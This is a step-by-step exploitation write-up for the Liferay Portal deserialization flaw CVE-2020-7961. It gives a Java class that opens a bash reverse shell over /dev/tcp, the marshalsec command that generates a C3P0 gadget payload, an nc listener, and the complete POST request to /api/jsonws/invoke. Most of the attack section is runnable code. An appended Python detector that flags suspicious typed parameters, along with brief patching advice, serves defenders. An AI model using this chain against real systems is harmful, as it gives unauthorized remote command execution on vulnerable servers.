si1ent

CVE-2020-7961

2021-03-04

Overview

Baidu Baike

Liferay is a ready-made, out-of-the-box, fully featured portal platform, Liferay Portal. It is a complete desktop collaboration suite designed for enterprises and institutions, and it can be freely adapted to different applications as Liferay Social Office. It offers more than 60 tools and a range of today's most innovative technologies for building websites and intranets that present the right documents and applications to the appropriate user groups.

Environment setup

docker

It is recommended to give Docker at least 2 GB of memory, otherwise the container may fail to start.


Vulnerability walkthrough

CVE-2020-7961

Vulnerability description

Liferay Portal CE is an open-source system for building websites quickly. Versions up to and including 7.2.0 GA1 contain a deserialization vulnerability in the API interface; exploiting it allows arbitrary command execution on the target server.

Affected versions

Liferay Portal 6.1

Liferay Portal 6.2

Liferay Portal 7.0

Liferay Portal 7.1

Liferay Portal 7.2

Vulnerability principle

Liferay Portal CE is an open-source system for building websites quickly. Versions up to and including 7.2.0 GA1 contain a deserialization vulnerability in the API interface; exploiting it allows arbitrary command execution on the target server.

Vulnerability conditions

Liferay Portal 6.1

Liferay Portal 6.2

Liferay Portal 7.0

Liferay Portal 7.1

Liferay Portal 7.2

Vulnerability detection

1. Visit the URL

http://192.168.10.51:8080/


2. First, prepare the malicious Java class

// LifExp.java
public class LifExp {

    static {
        try {
            String[] cmd = {"bash","-c","bash -i >& /dev/tcp/192.168.10.51/4444 0>&1"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
}

3. Compile locally

➜  test javac LifExp.java


4. Serve this directory over HTTP

➜  test python -m SimpleHTTPServer 9999


5. Generate the PoC

Because the target's Java version is relatively new, the gadget chain we use is com.mchange.v2.c3p0.WrapperConnectionPoolDataSource, and we use marshalsec to generate a PoC suitable for Jackson:

http://192.168.10.51:9999/ : the web server set up above

LifExp : the name of the malicious Java class

➜  test java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://192.168.10.51:9999/ LifExp

The generated payload is in the form Jackson uses; we only need to rewrite it in the form Liferay Portal expects, namely +parameterName:className=value:

+defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap: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;"}


6. Listen with nc

➜  ~ nc -lvnp 4444

7. Submit the above PoC via POST

Note:

When editing the HTTP request headers, remember to set the Content-Type as shown below, otherwise the PoC will not run.

POST /api/jsonws/invoke HTTP/1.1
Host: 192.168.10.51:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4239.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1352

cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap: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;"}
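As an added defender's example (not part of the original writeup), the following Python inspects a captured POST body sent to /api/jsonws/invoke for typed parameters in Liferay's +name:class=value form and flags any whose class lies outside an allowlist. The sample bodies, the allowlist prefixes and the hex placeholder are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Liferay JSONWS typed-parameter syntax: "+name:fully.qualified.Class=value".
# In the captured request the leading "+" arrives URL-encoded as "%2B", so the
# body is percent-decoded first (unquote, not unquote_plus, keeps literal "+").
TYPED_PARAM = re.compile(r"(?:^|&)\+(\w+):([\w.$]+)=")

# Class-name prefixes a JSONWS caller legitimately needs for typed parameters.
# Assumed allowlist for this example; tune it to the deployment's own API use.
ALLOWED_PREFIXES = ("com.liferay.", "java.lang.", "java.util.")

def find_typed_params(body):
    """Return [(param_name, class_name), ...] for every typed parameter."""
    return TYPED_PARAM.findall(unquote(body))

def inspect_request(path, body):
    """Return alert strings for a JSONWS request whose typed parameters name
    a class outside the allowlist; an empty list means nothing to flag."""
    if not path.startswith("/api/jsonws"):
        return []
    return [
        f"typed parameter '+{name}' requests class {cls}"
        for name, cls in find_typed_params(body)
        if not cls.startswith(ALLOWED_PREFIXES)
    ]

# Constructed sample bodies (not real traffic). The second mirrors the request
# shown above, with the serialized hex replaced by a placeholder.
BENIGN_BODY = (
    "cmd=%7B%22%2Fuser%2Fget-user-by-id%22%3A%7B%7D%7D&userId=20139"
    "&%2BserviceContext:com.liferay.portal.kernel.service.ServiceContext=%7B%7D"
)
SUSPICIOUS_BODY = (
    "cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=o3lt8q1F"
    "&formDate=1585270368703&tableId=1&name=2&type=3"
    "&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource="
    '{"userOverridesAsString":"HexAsciiSerializedMap:<HEX_PLACEHOLDER>;"}'
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspicious", SUSPICIOUS_BODY)):
        print(label, inspect_request("/api/jsonws/invoke", body) or "clean")
```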


Fix

The vendor has already released a fix; update promptly.

Tags: CVE